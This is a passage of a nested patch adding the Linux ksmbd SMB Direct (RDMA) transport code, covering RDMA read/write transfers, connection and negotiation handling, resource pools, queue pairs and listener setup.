++				/* iov[start] is too big, break it */
++				int nvec  = (buflen + max_iov_size - 1) /
++						max_iov_size;
++
++				for (j = 0; j < nvec; j++) {
++					vec.iov_base =
++						(char *)iov[start].iov_base +
++						j * max_iov_size;
++					vec.iov_len =
++						min_t(int, max_iov_size,
++						      buflen - max_iov_size * j);
++					remaining_data_length -= vec.iov_len;
++					ret = smb_direct_post_send_data(st, &send_ctx, &vec, 1,
++									remaining_data_length);
++					if (ret)
++						goto done;
++				}
++				i++;
++				if (i == niovs)
++					break;
++			}
++			start = i;
++			buflen = 0;
++		} else {
++			i++;
++			if (i == niovs) {
++				/* send out all remaining vecs */
++				remaining_data_length -= buflen;
++				ret = smb_direct_post_send_data(st, &send_ctx,
++								&iov[start], i - start,
++								remaining_data_length);
++				if (ret)
++					goto done;
++				break;
++			}
++		}
++	}
++
++done:
++	ret = smb_direct_flush_send_list(st, &send_ctx, true);
++
++	/*
++	 * As an optimization, we don't wait for individual I/O to finish
++	 * before sending the next one.
++	 * Send them all and wait for the pending send count to reach 0,
++	 * which means all the I/Os have gone out and we are good to return.
++	 */
++
++	wait_event(st->wait_send_pending,
++		   atomic_read(&st->send_pending) == 0);
++	return ret;
++}
++
++static void smb_direct_free_rdma_rw_msg(struct smb_direct_transport *t,
++					struct smb_direct_rdma_rw_msg *msg,
++					enum dma_data_direction dir)
++{
++	rdma_rw_ctx_destroy(&msg->rw_ctx, t->qp, t->qp->port,
++			    msg->sgt.sgl, msg->sgt.nents, dir);
++	sg_free_table_chained(&msg->sgt, SG_CHUNK_SIZE);
++	kfree(msg);
++}
++
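++/*
++ * Common completion handler for RDMA read and write work requests: on
++ * any failure other than a flush it drops the RDMA connection, then
++ * wakes the thread waiting in smb_direct_rdma_xmit().
++ */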
++static void read_write_done(struct ib_cq *cq, struct ib_wc *wc,
++			    enum dma_data_direction dir)
++{
++	struct smb_direct_rdma_rw_msg *msg = container_of(wc->wr_cqe,
++							  struct smb_direct_rdma_rw_msg, cqe);
++	struct smb_direct_transport *t = msg->t;
++
++	if (wc->status != IB_WC_SUCCESS) {
++		msg->status = -EIO;
++		pr_err("read/write error. opcode = %d, status = %s(%d)\n",
++		       wc->opcode, ib_wc_status_msg(wc->status), wc->status);
++		if (wc->status != IB_WC_WR_FLUSH_ERR)
++			smb_direct_disconnect_rdma_connection(t);
++	}
++
++	complete(msg->completion);
++}
++
++static void read_done(struct ib_cq *cq, struct ib_wc *wc)
++{
++	read_write_done(cq, wc, DMA_FROM_DEVICE);
++}
++
++static void write_done(struct ib_cq *cq, struct ib_wc *wc)
++{
++	read_write_done(cq, wc, DMA_TO_DEVICE);
++}
++
++static int smb_direct_rdma_xmit(struct smb_direct_transport *t,
++				void *buf, int buf_len,
++				struct smb2_buffer_desc_v1 *desc,
++				unsigned int desc_len,
++				bool is_read)
++{
++	struct smb_direct_rdma_rw_msg *msg, *next_msg;
++	int i, ret;
++	DECLARE_COMPLETION_ONSTACK(completion);
++	struct ib_send_wr *first_wr;
++	LIST_HEAD(msg_list);
++	char *desc_buf;
++	int credits_needed;
++	unsigned int desc_buf_len;
++	size_t total_length = 0;
++
++	if (t->status != SMB_DIRECT_CS_CONNECTED)
++		return -ENOTCONN;
++
++	/* calculate needed credits */
++	credits_needed = 0;
++	desc_buf = buf;
++	for (i = 0; i < desc_len / sizeof(*desc); i++) {
++		desc_buf_len = le32_to_cpu(desc[i].length);
++
++		credits_needed += calc_rw_credits(t, desc_buf, desc_buf_len);
++		desc_buf += desc_buf_len;
++		total_length += desc_buf_len;
++		if (desc_buf_len == 0 || total_length > buf_len ||
++		    total_length > t->max_rdma_rw_size)
++			return -EINVAL;
++	}
++
++	ksmbd_debug(RDMA, "RDMA %s, len %#x, needed credits %#x\n",
++		    is_read ? "read" : "write", buf_len, credits_needed);
++
++	ret = wait_for_rw_credits(t, credits_needed);
++	if (ret < 0)
++		return ret;
++
++	/* build rdma_rw_ctx for each descriptor */
++	desc_buf = buf;
++	for (i = 0; i < desc_len / sizeof(*desc); i++) {
++		msg = kzalloc(offsetof(struct smb_direct_rdma_rw_msg, sg_list) +
++			      sizeof(struct scatterlist) * SG_CHUNK_SIZE, GFP_KERNEL);
++		if (!msg) {
++			ret = -ENOMEM;
++			goto out;
++		}
++
++		desc_buf_len = le32_to_cpu(desc[i].length);
++
++		msg->t = t;
++		msg->cqe.done = is_read ? read_done : write_done;
++		msg->completion = &completion;
++
++		msg->sgt.sgl = &msg->sg_list[0];
++		ret = sg_alloc_table_chained(&msg->sgt,
++					     get_buf_page_count(desc_buf, desc_buf_len),
++					     msg->sg_list, SG_CHUNK_SIZE);
++		if (ret) {
++			kfree(msg);
++			ret = -ENOMEM;
++			goto out;
++		}
++
++		ret = get_sg_list(desc_buf, desc_buf_len,
++				  msg->sgt.sgl, msg->sgt.orig_nents);
++		if (ret < 0) {
++			sg_free_table_chained(&msg->sgt, SG_CHUNK_SIZE);
++			kfree(msg);
++			goto out;
++		}
++
++		ret = rdma_rw_ctx_init(&msg->rw_ctx, t->qp, t->qp->port,
++				       msg->sgt.sgl,
++				       get_buf_page_count(desc_buf, desc_buf_len),
++				       0,
++				       le64_to_cpu(desc[i].offset),
++				       le32_to_cpu(desc[i].token),
++				       is_read ? DMA_FROM_DEVICE : DMA_TO_DEVICE);
++		if (ret < 0) {
++			pr_err("failed to init rdma_rw_ctx: %d\n", ret);
++			sg_free_table_chained(&msg->sgt, SG_CHUNK_SIZE);
++			kfree(msg);
++			goto out;
++		}
++
++		list_add_tail(&msg->list, &msg_list);
++		desc_buf += desc_buf_len;
++	}
++
++	/* concatenate work requests of rdma_rw_ctxs */
++	first_wr = NULL;
++	list_for_each_entry_reverse(msg, &msg_list, list) {
++		first_wr = rdma_rw_ctx_wrs(&msg->rw_ctx, t->qp, t->qp->port,
++					   &msg->cqe, first_wr);
++	}
++
++	ret = ib_post_send(t->qp, first_wr, NULL);
++	if (ret) {
++		pr_err("failed to post send wr for RDMA R/W: %d\n", ret);
++		goto out;
++	}
++
++	msg = list_last_entry(&msg_list, struct smb_direct_rdma_rw_msg, list);
++	wait_for_completion(&completion);
++	ret = msg->status;
++out:
++	list_for_each_entry_safe(msg, next_msg, &msg_list, list) {
++		list_del(&msg->list);
++		smb_direct_free_rdma_rw_msg(t, msg,
++					    is_read ? DMA_FROM_DEVICE : DMA_TO_DEVICE);
++	}
++	atomic_add(credits_needed, &t->rw_credits);
++	wake_up(&t->wait_rw_credits);
++	return ret;
++}
++
++static int smb_direct_rdma_write(struct ksmbd_transport *t,
++				 void *buf, unsigned int buflen,
++				 struct smb2_buffer_desc_v1 *desc,
++				 unsigned int desc_len)
++{
++	return smb_direct_rdma_xmit(smb_trans_direct_transfort(t), buf, buflen,
++				    desc, desc_len, false);
++}
++
++static int smb_direct_rdma_read(struct ksmbd_transport *t,
++				void *buf, unsigned int buflen,
++				struct smb2_buffer_desc_v1 *desc,
++				unsigned int desc_len)
++{
++	return smb_direct_rdma_xmit(smb_trans_direct_transfort(t), buf, buflen,
++				    desc, desc_len, true);
++}
++
++static void smb_direct_disconnect(struct ksmbd_transport *t)
++{
++	struct smb_direct_transport *st = smb_trans_direct_transfort(t);
++
++	ksmbd_debug(RDMA, "Disconnecting cm_id=%p\n", st->cm_id);
++
++	smb_direct_disconnect_rdma_work(&st->disconnect_work);
++	wait_event_interruptible(st->wait_status,
++				 st->status == SMB_DIRECT_CS_DISCONNECTED);
++	free_transport(st);
++}
++
++static void smb_direct_shutdown(struct ksmbd_transport *t)
++{
++	struct smb_direct_transport *st = smb_trans_direct_transfort(t);
++
++	ksmbd_debug(RDMA, "smb-direct shutdown cm_id=%p\n", st->cm_id);
++
++	smb_direct_disconnect_rdma_work(&st->disconnect_work);
++}
++
++static int smb_direct_cm_handler(struct rdma_cm_id *cm_id,
++				 struct rdma_cm_event *event)
++{
++	struct smb_direct_transport *t = cm_id->context;
++
++	ksmbd_debug(RDMA, "RDMA CM event. cm_id=%p event=%s (%d)\n",
++		    cm_id, rdma_event_msg(event->event), event->event);
++
++	switch (event->event) {
++	case RDMA_CM_EVENT_ESTABLISHED: {
++		t->status = SMB_DIRECT_CS_CONNECTED;
++		wake_up_interruptible(&t->wait_status);
++		break;
++	}
++	case RDMA_CM_EVENT_DEVICE_REMOVAL:
++	case RDMA_CM_EVENT_DISCONNECTED: {
++		ib_drain_qp(t->qp);
++
++		t->status = SMB_DIRECT_CS_DISCONNECTED;
++		wake_up_interruptible(&t->wait_status);
++		wake_up_interruptible(&t->wait_reassembly_queue);
++		wake_up(&t->wait_send_credits);
++		break;
++	}
++	case RDMA_CM_EVENT_CONNECT_ERROR: {
++		t->status = SMB_DIRECT_CS_DISCONNECTED;
++		wake_up_interruptible(&t->wait_status);
++		break;
++	}
++	default:
++		pr_err("Unexpected RDMA CM event. cm_id=%p, event=%s (%d)\n",
++		       cm_id, rdma_event_msg(event->event),
++		       event->event);
++		break;
++	}
++	return 0;
++}
++
++static void smb_direct_qpair_handler(struct ib_event *event, void *context)
++{
++	struct smb_direct_transport *t = context;
++
++	ksmbd_debug(RDMA, "Received QP event. cm_id=%p, event=%s (%d)\n",
++		    t->cm_id, ib_event_msg(event->event), event->event);
++
++	switch (event->event) {
++	case IB_EVENT_CQ_ERR:
++	case IB_EVENT_QP_FATAL:
++		smb_direct_disconnect_rdma_connection(t);
++		break;
++	default:
++		break;
++	}
++}
++
++static int smb_direct_send_negotiate_response(struct smb_direct_transport *t,
++					      int failed)
++{
++	struct smb_direct_sendmsg *sendmsg;
++	struct smb_direct_negotiate_resp *resp;
++	int ret;
++
++	sendmsg = smb_direct_alloc_sendmsg(t);
++	if (IS_ERR(sendmsg))
++		return -ENOMEM;
++
++	resp = (struct smb_direct_negotiate_resp *)sendmsg->packet;
++	if (failed) {
++		memset(resp, 0, sizeof(*resp));
++		resp->min_version = cpu_to_le16(0x0100);
++		resp->max_version = cpu_to_le16(0x0100);
++		resp->status = STATUS_NOT_SUPPORTED;
++	} else {
++		resp->status = STATUS_SUCCESS;
++		resp->min_version = SMB_DIRECT_VERSION_LE;
++		resp->max_version = SMB_DIRECT_VERSION_LE;
++		resp->negotiated_version = SMB_DIRECT_VERSION_LE;
++		resp->reserved = 0;
++		resp->credits_requested =
++				cpu_to_le16(t->send_credit_target);
++		resp->credits_granted = cpu_to_le16(manage_credits_prior_sending(t));
++		resp->max_readwrite_size = cpu_to_le32(t->max_rdma_rw_size);
++		resp->preferred_send_size = cpu_to_le32(t->max_send_size);
++		resp->max_receive_size = cpu_to_le32(t->max_recv_size);
++		resp->max_fragmented_size =
++				cpu_to_le32(t->max_fragmented_recv_size);
++	}
++
++	sendmsg->sge[0].addr = ib_dma_map_single(t->cm_id->device,
++						 (void *)resp, sizeof(*resp),
++						 DMA_TO_DEVICE);
++	ret = ib_dma_mapping_error(t->cm_id->device, sendmsg->sge[0].addr);
++	if (ret) {
++		smb_direct_free_sendmsg(t, sendmsg);
++		return ret;
++	}
++
++	sendmsg->num_sge = 1;
++	sendmsg->sge[0].length = sizeof(*resp);
++	sendmsg->sge[0].lkey = t->pd->local_dma_lkey;
++
++	ret = post_sendmsg(t, NULL, sendmsg);
++	if (ret) {
++		smb_direct_free_sendmsg(t, sendmsg);
++		return ret;
++	}
++
++	wait_event(t->wait_send_pending,
++		   atomic_read(&t->send_pending) == 0);
++	return 0;
++}
++
++static int smb_direct_accept_client(struct smb_direct_transport *t)
++{
++	struct rdma_conn_param conn_param;
++	struct ib_port_immutable port_immutable;
++	u32 ird_ord_hdr[2];
++	int ret;
++
++	memset(&conn_param, 0, sizeof(conn_param));
++	conn_param.initiator_depth = min_t(u8, t->cm_id->device->attrs.max_qp_rd_atom,
++					   SMB_DIRECT_CM_INITIATOR_DEPTH);
++	conn_param.responder_resources = 0;
++
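++	/*
++	 * For iWARP there is no in-protocol IRD/ORD negotiation, so the
++	 * initiator depth and responder resources are advertised to the
++	 * peer through the connection's private data.
++	 */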
++	t->cm_id->device->ops.get_port_immutable(t->cm_id->device,
++						 t->cm_id->port_num,
++						 &port_immutable);
++	if (port_immutable.core_cap_flags & RDMA_CORE_PORT_IWARP) {
++		ird_ord_hdr[0] = conn_param.responder_resources;
++		ird_ord_hdr[1] = 1;
++		conn_param.private_data = ird_ord_hdr;
++		conn_param.private_data_len = sizeof(ird_ord_hdr);
++	} else {
++		conn_param.private_data = NULL;
++		conn_param.private_data_len = 0;
++	}
++	conn_param.retry_count = SMB_DIRECT_CM_RETRY;
++	conn_param.rnr_retry_count = SMB_DIRECT_CM_RNR_RETRY;
++	conn_param.flow_control = 0;
++
++	ret = rdma_accept(t->cm_id, &conn_param);
++	if (ret) {
++		pr_err("error at rdma_accept: %d\n", ret);
++		return ret;
++	}
++	return 0;
++}
++
++static int smb_direct_prepare_negotiation(struct smb_direct_transport *t)
++{
++	int ret;
++	struct smb_direct_recvmsg *recvmsg;
++
++	recvmsg = get_free_recvmsg(t);
++	if (!recvmsg)
++		return -ENOMEM;
++	recvmsg->type = SMB_DIRECT_MSG_NEGOTIATE_REQ;
++
++	ret = smb_direct_post_recv(t, recvmsg);
++	if (ret) {
++		pr_err("Can't post recv: %d\n", ret);
++		goto out_err;
++	}
++
++	t->negotiation_requested = false;
++	ret = smb_direct_accept_client(t);
++	if (ret) {
++		pr_err("Can't accept client\n");
++		goto out_err;
++	}
++
++	smb_direct_post_recv_credits(&t->post_recv_credits_work.work);
++	return 0;
++out_err:
++	put_recvmsg(t, recvmsg);
++	return ret;
++}
++
++static unsigned int smb_direct_get_max_fr_pages(struct smb_direct_transport *t)
++{
++	return min_t(unsigned int,
++		     t->cm_id->device->attrs.max_fast_reg_page_list_len,
++		     256);
++}
++
++static int smb_direct_init_params(struct smb_direct_transport *t,
++				  struct ib_qp_cap *cap)
++{
++	struct ib_device *device = t->cm_id->device;
++	int max_send_sges, max_rw_wrs, max_send_wrs;
++	unsigned int max_sge_per_wr, wrs_per_credit;
++
++	/* Need 3 more SGEs, because the SMB_DIRECT header, the SMB2 header,
++	 * and the SMB2 response could each be mapped separately.
++	 */
++	t->max_send_size = smb_direct_max_send_size;
++	max_send_sges = DIV_ROUND_UP(t->max_send_size, PAGE_SIZE) + 3;
++	if (max_send_sges > SMB_DIRECT_MAX_SEND_SGES) {
++		pr_err("max_send_size %d is too large\n", t->max_send_size);
++		return -EINVAL;
++	}
++
++	/* Calculate the number of work requests for RDMA R/W.
++	 * The maximum number of pages which can be registered
++	 * with one Memory region can be transferred with one
++	 * R/W credit. And at least 4 work requests for each credit
++	 * are needed for MR registration, RDMA R/W, local & remote
++	 * MR invalidation.
++	 */
++	t->max_rdma_rw_size = smb_direct_max_read_write_size;
++	t->pages_per_rw_credit = smb_direct_get_max_fr_pages(t);
++	t->max_rw_credits = DIV_ROUND_UP(t->max_rdma_rw_size,
++					 (t->pages_per_rw_credit - 1) *
++					 PAGE_SIZE);
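++	/*
++	 * One page per credit is held back because an unaligned buffer
++	 * can straddle an extra page boundary.
++	 */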
++
++	max_sge_per_wr = min_t(unsigned int, device->attrs.max_send_sge,
++			       device->attrs.max_sge_rd);
++	max_sge_per_wr = max_t(unsigned int, max_sge_per_wr,
++			       max_send_sges);
++	wrs_per_credit = max_t(unsigned int, 4,
++			       DIV_ROUND_UP(t->pages_per_rw_credit,
++					    max_sge_per_wr) + 1);
++	max_rw_wrs = t->max_rw_credits * wrs_per_credit;
++
++	max_send_wrs = smb_direct_send_credit_target + max_rw_wrs;
++	if (max_send_wrs > device->attrs.max_cqe ||
++	    max_send_wrs > device->attrs.max_qp_wr) {
++		pr_err("consider lowering send_credit_target = %d\n",
++		       smb_direct_send_credit_target);
++		pr_err("Possible CQE overrun, device reporting max_cqe %d max_qp_wr %d\n",
++		       device->attrs.max_cqe, device->attrs.max_qp_wr);
++		return -EINVAL;
++	}
++
++	if (smb_direct_receive_credit_max > device->attrs.max_cqe ||
++	    smb_direct_receive_credit_max > device->attrs.max_qp_wr) {
++		pr_err("consider lowering receive_credit_max = %d\n",
++		       smb_direct_receive_credit_max);
++		pr_err("Possible CQE overrun, device reporting max_cpe %d max_qp_wr %d\n",
++		       device->attrs.max_cqe, device->attrs.max_qp_wr);
++		return -EINVAL;
++	}
++
++	if (device->attrs.max_recv_sge < SMB_DIRECT_MAX_RECV_SGES) {
++		pr_err("warning: device max_recv_sge = %d too small\n",
++		       device->attrs.max_recv_sge);
++		return -EINVAL;
++	}
++
++	t->recv_credits = 0;
++	t->count_avail_recvmsg = 0;
++
++	t->recv_credit_max = smb_direct_receive_credit_max;
++	t->recv_credit_target = 10;
++	t->new_recv_credits = 0;
++
++	t->send_credit_target = smb_direct_send_credit_target;
++	atomic_set(&t->send_credits, 0);
++	atomic_set(&t->rw_credits, t->max_rw_credits);
++
++	t->max_send_size = smb_direct_max_send_size;
++	t->max_recv_size = smb_direct_max_receive_size;
++	t->max_fragmented_recv_size = smb_direct_max_fragmented_recv_size;
++
++	cap->max_send_wr = max_send_wrs;
++	cap->max_recv_wr = t->recv_credit_max;
++	cap->max_send_sge = max_sge_per_wr;
++	cap->max_recv_sge = SMB_DIRECT_MAX_RECV_SGES;
++	cap->max_inline_data = 0;
++	cap->max_rdma_ctxs = t->max_rw_credits;
++	return 0;
++}
++
++static void smb_direct_destroy_pools(struct smb_direct_transport *t)
++{
++	struct smb_direct_recvmsg *recvmsg;
++
++	while ((recvmsg = get_free_recvmsg(t)))
++		mempool_free(recvmsg, t->recvmsg_mempool);
++	while ((recvmsg = get_empty_recvmsg(t)))
++		mempool_free(recvmsg, t->recvmsg_mempool);
++
++	mempool_destroy(t->recvmsg_mempool);
++	t->recvmsg_mempool = NULL;
++
++	kmem_cache_destroy(t->recvmsg_cache);
++	t->recvmsg_cache = NULL;
++
++	mempool_destroy(t->sendmsg_mempool);
++	t->sendmsg_mempool = NULL;
++
++	kmem_cache_destroy(t->sendmsg_cache);
++	t->sendmsg_cache = NULL;
++}
++
++static int smb_direct_create_pools(struct smb_direct_transport *t)
++{
++	char name[80];
++	int i;
++	struct smb_direct_recvmsg *recvmsg;
++
++	snprintf(name, sizeof(name), "smb_direct_rqst_pool_%p", t);
++	t->sendmsg_cache = kmem_cache_create(name,
++					     sizeof(struct smb_direct_sendmsg) +
++					      sizeof(struct smb_direct_negotiate_resp),
++					     0, SLAB_HWCACHE_ALIGN, NULL);
++	if (!t->sendmsg_cache)
++		return -ENOMEM;
++
++	t->sendmsg_mempool = mempool_create(t->send_credit_target,
++					    mempool_alloc_slab, mempool_free_slab,
++					    t->sendmsg_cache);
++	if (!t->sendmsg_mempool)
++		goto err;
++
++	snprintf(name, sizeof(name), "smb_direct_resp_%p", t);
++	t->recvmsg_cache = kmem_cache_create(name,
++					     sizeof(struct smb_direct_recvmsg) +
++					      t->max_recv_size,
++					     0, SLAB_HWCACHE_ALIGN, NULL);
++	if (!t->recvmsg_cache)
++		goto err;
++
++	t->recvmsg_mempool =
++		mempool_create(t->recv_credit_max, mempool_alloc_slab,
++			       mempool_free_slab, t->recvmsg_cache);
++	if (!t->recvmsg_mempool)
++		goto err;
++
++	INIT_LIST_HEAD(&t->recvmsg_queue);
++
++	for (i = 0; i < t->recv_credit_max; i++) {
++		recvmsg = mempool_alloc(t->recvmsg_mempool, GFP_KERNEL);
++		if (!recvmsg)
++			goto err;
++		recvmsg->transport = t;
++		list_add(&recvmsg->list, &t->recvmsg_queue);
++	}
++	t->count_avail_recvmsg = t->recv_credit_max;
++
++	return 0;
++err:
++	smb_direct_destroy_pools(t);
++	return -ENOMEM;
++}
++
++static int smb_direct_create_qpair(struct smb_direct_transport *t,
++				   struct ib_qp_cap *cap)
++{
++	int ret;
++	struct ib_qp_init_attr qp_attr;
++	int pages_per_rw;
++
++	t->pd = ib_alloc_pd(t->cm_id->device, 0);
++	if (IS_ERR(t->pd)) {
++		pr_err("Can't create RDMA PD\n");
++		ret = PTR_ERR(t->pd);
++		t->pd = NULL;
++		return ret;
++	}
++
++	t->send_cq = ib_alloc_cq(t->cm_id->device, t,
++				 smb_direct_send_credit_target + cap->max_rdma_ctxs,
++				 0, IB_POLL_WORKQUEUE);
++	if (IS_ERR(t->send_cq)) {
++		pr_err("Can't create RDMA send CQ\n");
++		ret = PTR_ERR(t->send_cq);
++		t->send_cq = NULL;
++		goto err;
++	}
++
++	t->recv_cq = ib_alloc_cq(t->cm_id->device, t,
++				 t->recv_credit_max, 0, IB_POLL_WORKQUEUE);
++	if (IS_ERR(t->recv_cq)) {
++		pr_err("Can't create RDMA recv CQ\n");
++		ret = PTR_ERR(t->recv_cq);
++		t->recv_cq = NULL;
++		goto err;
++	}
++
++	memset(&qp_attr, 0, sizeof(qp_attr));
++	qp_attr.event_handler = smb_direct_qpair_handler;
++	qp_attr.qp_context = t;
++	qp_attr.cap = *cap;
++	qp_attr.sq_sig_type = IB_SIGNAL_REQ_WR;
++	qp_attr.qp_type = IB_QPT_RC;
++	qp_attr.send_cq = t->send_cq;
++	qp_attr.recv_cq = t->recv_cq;
++	qp_attr.port_num = ~0;
++
++	ret = rdma_create_qp(t->cm_id, t->pd, &qp_attr);
++	if (ret) {
++		pr_err("Can't create RDMA QP: %d\n", ret);
++		goto err;
++	}
++
++	t->qp = t->cm_id->qp;
++	t->cm_id->event_handler = smb_direct_cm_handler;
++
++	pages_per_rw = DIV_ROUND_UP(t->max_rdma_rw_size, PAGE_SIZE) + 1;
++	if (pages_per_rw > t->cm_id->device->attrs.max_sgl_rd) {
++		ret = ib_mr_pool_init(t->qp, &t->qp->rdma_mrs,
++				      t->max_rw_credits, IB_MR_TYPE_MEM_REG,
++				      t->pages_per_rw_credit, 0);
++		if (ret) {
++			pr_err("failed to init mr pool count %d pages %d\n",
++			       t->max_rw_credits, t->pages_per_rw_credit);
++			goto err;
++		}
++	}
++
++	return 0;
++err:
++	if (t->qp) {
++		ib_destroy_qp(t->qp);
++		t->qp = NULL;
++	}
++	if (t->recv_cq) {
++		ib_destroy_cq(t->recv_cq);
++		t->recv_cq = NULL;
++	}
++	if (t->send_cq) {
++		ib_destroy_cq(t->send_cq);
++		t->send_cq = NULL;
++	}
++	if (t->pd) {
++		ib_dealloc_pd(t->pd);
++		t->pd = NULL;
++	}
++	return ret;
++}
++
++static int smb_direct_prepare(struct ksmbd_transport *t)
++{
++	struct smb_direct_transport *st = smb_trans_direct_transfort(t);
++	struct smb_direct_recvmsg *recvmsg;
++	struct smb_direct_negotiate_req *req;
++	int ret;
++
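++	/*
++	 * The client must open the connection with a negotiate request;
++	 * wait for it, a disconnect, or the negotiation timeout.
++	 */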
++	ksmbd_debug(RDMA, "Waiting for SMB_DIRECT negotiate request\n");
++	ret = wait_event_interruptible_timeout(st->wait_status,
++					       st->negotiation_requested ||
++					       st->status == SMB_DIRECT_CS_DISCONNECTED,
++					       SMB_DIRECT_NEGOTIATE_TIMEOUT * HZ);
++	if (ret <= 0 || st->status == SMB_DIRECT_CS_DISCONNECTED)
++		return ret < 0 ? ret : -ETIMEDOUT;
++
++	recvmsg = get_first_reassembly(st);
++	if (!recvmsg)
++		return -ECONNABORTED;
++
++	ret = smb_direct_check_recvmsg(recvmsg);
++	if (ret == -ECONNABORTED)
++		goto out;
++
++	req = (struct smb_direct_negotiate_req *)recvmsg->packet;
++	st->max_recv_size = min_t(int, st->max_recv_size,
++				  le32_to_cpu(req->preferred_send_size));
++	st->max_send_size = min_t(int, st->max_send_size,
++				  le32_to_cpu(req->max_receive_size));
++	st->max_fragmented_send_size =
++		le32_to_cpu(req->max_fragmented_size);
++	st->max_fragmented_recv_size =
++		(st->recv_credit_max * st->max_recv_size) / 2;
++
++	ret = smb_direct_send_negotiate_response(st, ret);
++out:
++	spin_lock_irq(&st->reassembly_queue_lock);
++	st->reassembly_queue_length--;
++	list_del(&recvmsg->list);
++	spin_unlock_irq(&st->reassembly_queue_lock);
++	put_recvmsg(st, recvmsg);
++
++	return ret;
++}
++
++static int smb_direct_connect(struct smb_direct_transport *st)
++{
++	int ret;
++	struct ib_qp_cap qp_cap;
++
++	ret = smb_direct_init_params(st, &qp_cap);
++	if (ret) {
++		pr_err("Can't configure RDMA parameters\n");
++		return ret;
++	}
++
++	ret = smb_direct_create_pools(st);
++	if (ret) {
++		pr_err("Can't init RDMA pool: %d\n", ret);
++		return ret;
++	}
++
++	ret = smb_direct_create_qpair(st, &qp_cap);
++	if (ret) {
++		pr_err("Can't accept RDMA client: %d\n", ret);
++		return ret;
++	}
++
++	ret = smb_direct_prepare_negotiation(st);
++	if (ret) {
++		pr_err("Can't negotiate: %d\n", ret);
++		return ret;
++	}
++	return 0;
++}
++
++static bool rdma_frwr_is_supported(struct ib_device_attr *attrs)
++{
++	if (!(attrs->device_cap_flags & IB_DEVICE_MEM_MGT_EXTENSIONS))
++		return false;
++	if (attrs->max_fast_reg_page_list_len == 0)
++		return false;
++	return true;
++}
++
++static int smb_direct_handle_connect_request(struct rdma_cm_id *new_cm_id)
++{
++	struct smb_direct_transport *t;
++	int ret;
++
++	if (!rdma_frwr_is_supported(&new_cm_id->device->attrs)) {
++		ksmbd_debug(RDMA,
++			    "Fast Registration Work Requests is not supported. device capabilities=%llx\n",
++			    new_cm_id->device->attrs.device_cap_flags);
++		return -EPROTONOSUPPORT;
++	}
++
++	t = alloc_transport(new_cm_id);
++	if (!t)
++		return -ENOMEM;
++
++	ret = smb_direct_connect(t);
++	if (ret)
++		goto out_err;
++
++	KSMBD_TRANS(t)->handler = kthread_run(ksmbd_conn_handler_loop,
++					      KSMBD_TRANS(t)->conn, "ksmbd:r%u",
++					      smb_direct_port);
++	if (IS_ERR(KSMBD_TRANS(t)->handler)) {
++		ret = PTR_ERR(KSMBD_TRANS(t)->handler);
++		pr_err("Can't start thread\n");
++		goto out_err;
++	}
++
++	return 0;
++out_err:
++	free_transport(t);
++	return ret;
++}
++
++static int smb_direct_listen_handler(struct rdma_cm_id *cm_id,
++				     struct rdma_cm_event *event)
++{
++	switch (event->event) {
++	case RDMA_CM_EVENT_CONNECT_REQUEST: {
++		int ret = smb_direct_handle_connect_request(cm_id);
++
++		if (ret) {
++			pr_err("Can't create transport: %d\n", ret);
++			return ret;
++		}
++
++		ksmbd_debug(RDMA, "Received connection request. cm_id=%p\n",
++			    cm_id);
++		break;
++	}
++	default:
++		pr_err("Unexpected listen event. cm_id=%p, event=%s (%d)\n",
++		       cm_id, rdma_event_msg(event->event), event->event);
++		break;
++	}
++	return 0;
++}
++
++static int smb_direct_listen(int port)
++{
++	int ret;
++	struct rdma_cm_id *cm_id;
++	struct sockaddr_in sin = {
++		.sin_family		= AF_INET,
++		.sin_addr.s_addr	= htonl(INADDR_ANY),
++		.sin_port		= htons(port),
++	};
++
++	cm_id = rdma_create_id(&init_net, smb_direct_listen_handler,
++			       &smb_direct_listener, RDMA_PS_TCP, IB_QPT_RC);
++	if (IS_ERR(cm_id)) {
++		pr_err("Can't create cm id: %ld\n", PTR_ERR(cm_id));
++		return PTR_ERR(cm_id);
++	}
++
++	ret = rdma_bind_addr(cm_id, (struct sockaddr *)&sin);
++	if (ret) {
++		pr_err("Can't bind: %d\n", ret);
++		goto err;
++	}
++
++	smb_direct_listener.cm_id = cm_id;
++
++	ret = rdma_listen(cm_id, 10);
++	if (ret) {
++		pr_err("Can't listen: %d\n", ret);
++		goto err;
++	}
++	return 0;
++err:
++	smb_direct_listener.cm_id = NULL;
++	rdma_destroy_id(cm_id);
++	return ret;
++}
++
++static int smb_direct_ib_client_add(struct ib_device *ib_dev)
++{
++	struct smb_direct_device *smb_dev;
++
++	/* Use port 5445 if the device type is iWARP (not IB) */
++	if (ib_dev->node_type != RDMA_NODE_IB_CA)
++		smb_direct_port = SMB_DIRECT_PORT_IWARP;
++
++	if (!ib_dev->ops.get_netdev ||
++	    !rdma_frwr_is_supported(&ib_dev->attrs))
++		return 0;
++
++	smb_dev = kzalloc(sizeof(*smb_dev), GFP_KERNEL);
++	if (!smb_dev)
++		return -ENOMEM;
++	smb_dev->ib_dev = ib_dev;
++
++	write_lock(&smb_direct_device_lock);
++	list_add(&smb_dev->list, &smb_direct_device_list);
++	write_unlock(&smb_direct_device_lock);
++
++	ksmbd_debug(RDMA, "ib device added: name %s\n", ib_dev->name);
++	return 0;
++}
++
++static void smb_direct_ib_client_remove(struct ib_device *ib_dev,
++					void *client_data)
++{
++	struct smb_direct_device *smb_dev, *tmp;
++
++	write_lock(&smb_direct_device_lock);
++	list_for_each_entry_safe(smb_dev, tmp, &smb_direct_device_list, list) {
++		if (smb_dev->ib_dev == ib_dev) {
++			list_del(&smb_dev->list);
++			kfree(smb_dev);
++			break;
++		}
++	}
++	write_unlock(&smb_direct_device_lock);
++}
++
++static struct ib_client smb_direct_ib_client = {
++	.name	= "ksmbd_smb_direct_ib",
++	.add	= smb_direct_ib_client_add,
++	.remove	= smb_direct_ib_client_remove,
++};
++
++int ksmbd_rdma_init(void)
++{
++	int ret;
++
++	smb_direct_listener.cm_id = NULL;
++
++	ret = ib_register_client(&smb_direct_ib_client);
++	if (ret) {
++		pr_err("failed to ib_register_client\n");
++		return ret;
++	}
++
++	/* When a client is running out of send credits, the credits are
++	 * granted by the server sending a packet through this workqueue.
++	 * This avoids the situation where a client cannot send packets
++	 * for lack of credits.
++	 */
++	smb_direct_wq = alloc_workqueue("ksmbd-smb_direct-wq",
++					WQ_HIGHPRI | WQ_MEM_RECLAIM, 0);
++	if (!smb_direct_wq)
++		return -ENOMEM;
++
++	ret = smb_direct_listen(smb_direct_port);
++	if (ret) {
++		destroy_workqueue(smb_direct_wq);
++		smb_direct_wq = NULL;
++		pr_err("Can't listen: %d\n", ret);
++		return ret;
++	}
++
++	ksmbd_debug(RDMA, "init RDMA listener. cm_id=%p\n",
++		    smb_direct_listener.cm_id);
